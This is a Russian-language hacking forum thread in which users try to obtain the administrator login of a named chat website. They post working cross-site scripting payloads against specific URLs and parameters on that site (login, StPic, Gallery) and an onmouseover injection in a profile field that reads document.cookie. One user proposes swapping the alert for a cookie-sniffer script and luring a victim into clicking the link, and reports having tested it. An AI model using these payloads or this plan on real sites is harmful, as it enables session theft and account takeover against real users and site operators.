http://chat.russianamerica.com:8080/ помогите узнать логин админа и код с уважением Автоматический гранатамёт Стечкина.
первое че брасаеться в глаза это пасив на главной странице Code: http://chat.russianamerica.com:8080/login?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E ток пробел над убрать в document.cookie буду смотреть дальше... -- в профиле не фильтруються двойные кавычки
вот и я нашел http://chat.russianamerica.com:8080/StPic?n='><script>alert(/Kaban/)</script> XSS эта вроде работает, только когда под ником сидишь
ну вот те пожалуст! осталось заместо алерта подставить скрипт для сниффера и впарить комут ссылку! уже проверил работает!
вроде тоже проходит http://chat.russianamerica.com:8080/Gallery?s=%22%3E%3Cscript%3Ealert(/Kaban/)%3C/script%3E
Еще нашол в профиле полуактивную xss в поле Домашняя страничка: вставляеш Code: " onmouseover=javascript:alert(document.cookie) " при наведение срабатывает
Хакеры а что именно открываеться что то я не пойму что можно с этим делать и что логин и пароль админа не узнать?
вот в этой статье всё прекрасно описано что делать, как делать и зачем делать. http://forum.antichat.ru/thread20140.html
